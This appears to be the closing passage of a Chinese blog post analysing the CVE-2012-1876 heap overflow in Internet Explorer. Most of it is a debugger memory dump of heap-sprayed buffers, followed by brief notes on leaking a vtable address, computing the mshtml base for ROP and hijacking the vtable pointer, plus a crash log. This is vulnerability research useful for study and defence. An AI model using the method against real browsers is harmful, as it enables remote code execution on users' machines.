42 00 42 00 B.B.B.B.B.B.B.B. 03f2b110 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b120 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b130 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b140 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b150 42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00 B.B.B.B.B.B.B... 03f2b160 05 10 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00 .........j...... 03f2b170 02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01 .........:.h..7. 03f2b180 70 90 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00 p....<.h........ 03f2b190 09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00 ................ 03f2b1a0 00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff ................ 03f2b1b0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2b1c0 00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00 ....$... ....... 03f2b1d0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2b1e0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2b1f0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2b200 00 00 00 00 00 00 00 00-00 00 00 00 28 b2 f2 03 ............(... 03f2b210 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2b220 01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2b230 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2b240 ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff ................ 03f2b250 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2b260 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2b270 00 00 00 00 00 00 00 00-66 10 d1 01 00 00 00 c2 ........f....... 03f2b280 a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05 .0.............. 03f2b290 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................ 03f2b2a0 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H....... 03f2b2b0 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E. 03f2b2c0 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H........... 03f2b2d0 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E. 03f2b2e0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H............... 03f2b2f0 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H... 03f2b300 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................ 03f2b310 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H....... 03f2b320 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E. 03f2b330 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H........... 03f2b340 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E. 03f2b350 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H............... 03f2b360 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H... 03f2b370 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................ 03f2b380 45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00 E.E.A.E.H...E... 03f2b390 5b 10 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00 [........a...... 03f2b3a0 02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00 ............A.A. 03f2b3b0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b3c0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b3d0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b3e0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b3f0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b400 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b410 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b420 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b430 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b440 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b450 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b460 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b470 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b480 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b490 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b4a0 41 00 41 00 41 00 00 00-bc 10 d1 01 00 00 00 c2 A.A.A........... 03f2b4b0 0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05 .a.............. 03f2b4c0 fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00 ....B.B.B.B.B.B. 03f2b4d0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b4e0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b4f0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b500 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b510 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b520 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b530 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b540 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b550 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b560 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b570 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b580 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b590 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b5a0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b5b0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00 B.B.B.B.B.B.B... 03f2b5c0 91 10 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00 .........j...... 03f2b5d0 02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01 .........:.h..7. 03f2b5e0 e0 90 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00 .....<.h........ 03f2b5f0 09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00 ................ 03f2b600 00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff ................ 03f2b610 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2b620 00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00 ....$... ....... 03f2b630 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2b640 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2b650 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2b660 00 00 00 00 00 00 00 00-00 00 00 00 88 b6 f2 03 ................ 03f2b670 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2b680 01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2b690 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2b6a0 ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff ................ 03f2b6b0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2b6c0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2b6d0 00 00 00 00 00 00 00 00-f2 10 d1 01 00 00 00 c2 ................ 03f2b6e0 a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05 .0.............. 03f2b6f0 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................ 03f2b700 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H....... 03f2b710 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E. 03f2b720 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H........... 03f2b730 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E. 03f2b740 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H............... 03f2b750 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H... 03f2b760 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................ 03f2b770 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H....... 03f2b780 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E. 03f2b790 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H........... 03f2b7a0 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E. 03f2b7b0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H............... 03f2b7c0 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H... 03f2b7d0 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................ 03f2b7e0 45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00 E.E.A.E.H...E... 03f2b7f0 d7 10 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00 .........a...... 03f2b800 02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00 ............A.A. 03f2b810 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b820 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b830 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b840 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b850 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b860 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b870 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b880 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b890 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b8a0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b8b0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b8c0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b8d0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b8e0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b8f0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2b900 41 00 41 00 41 00 00 00-08 11 d1 01 00 00 00 c2 A.A.A........... 03f2b910 0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05 .a.............. 03f2b920 fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00 ....B.B.B.B.B.B. 03f2b930 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b940 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b950 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b960 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b970 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b980 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b990 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b9a0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b9b0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b9c0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b9d0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b9e0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2b9f0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2ba00 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2ba10 42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00 B.B.B.B.B.B.B... 03f2ba20 6d 11 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00 m........j...... 03f2ba30 02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01 .........:.h..7. 03f2ba40 50 91 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00 P....<.h........ 03f2ba50 09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00 ................ 03f2ba60 00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff ................ 03f2ba70 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2ba80 00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00 ....$... ....... 03f2ba90 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2baa0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2bab0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2bac0 00 00 00 00 00 00 00 00-00 00 00 00 e8 ba f2 03 ................ 03f2bad0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2bae0 01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2baf0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2bb00 ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff ................ 03f2bb10 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2bb20 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 03f2bb30 00 00 00 00 00 00 00 00-4e 11 d1 01 00 00 00 c2 ........N....... 03f2bb40 a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05 .0.............. 03f2bb50 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................ 03f2bb60 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H....... 03f2bb70 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E. 03f2bb80 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H........... 03f2bb90 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E. 03f2bba0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H............... 03f2bbb0 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H... 03f2bbc0 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................ 03f2bbd0 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H....... 03f2bbe0 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E. 03f2bbf0 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H........... 03f2bc00 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E. 03f2bc10 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H............... 03f2bc20 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H... 03f2bc30 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................ 03f2bc40 45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00 E.E.A.E.H...E... 03f2bc50 a3 11 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00 .........a...... 03f2bc60 02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00 ............A.A. 03f2bc70 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2bc80 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2bc90 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2bca0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2bcb0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2bcc0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2bcd0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2bce0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2bcf0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2bd00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2bd10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2bd20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2bd30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2bd40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2bd50 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 03f2bd60 41 00 41 00 41 00 00 00-84 11 d1 01 00 00 00 c2 A.A.A........... 03f2bd70 0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05 .a.............. 03f2bd80 fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00 ....B.B.B.B.B.B. 03f2bd90 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2bda0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2bdb0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2bdc0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2bdd0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2bde0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2bdf0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2be00 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2be10 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2be20 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2be30 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B. 03f2be40 42 00 42 00 42 00 42 00-42 00 42 00 B.B.B.B.B.B.

很簡單的能觀察到03f2ae30的AAAA字符串被大量覆蓋，所以它就是vulheap。得到虛表地址后，計算mshtml基地址，構(gòu)造rop。然后再次溢出，這次溢出直接像剛剛覆蓋BBBB的大小一樣，直接覆蓋虛表指針，于是就可以劫持虛表指針到任意地址，如下

(6cc.7f8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=07070024--->控制虛表指針 ebx=01000000 ecx=040f8910 edx=00000041 esi=0375f530 edi=040e0790 eip=003d006b esp=0375f368 ebp=0375f3a0 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 003d006b 777a ja 003d00e7 [br=1]

到此，這個洞的分析就結(jié)束了。

參考資料

《漏洞戰(zhàn)爭》

WinDbg漏洞分析調(diào)試(一)：https://paper.seebug.org/179/

總結(jié)

以上是生活随笔為你收集整理的CVE-2012-1876 Internet Exporter堆溢出漏洞分析的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。

上一篇： WeTool逆向：借用别人的成果打造自
下一篇： Windows内核实验001 中断提权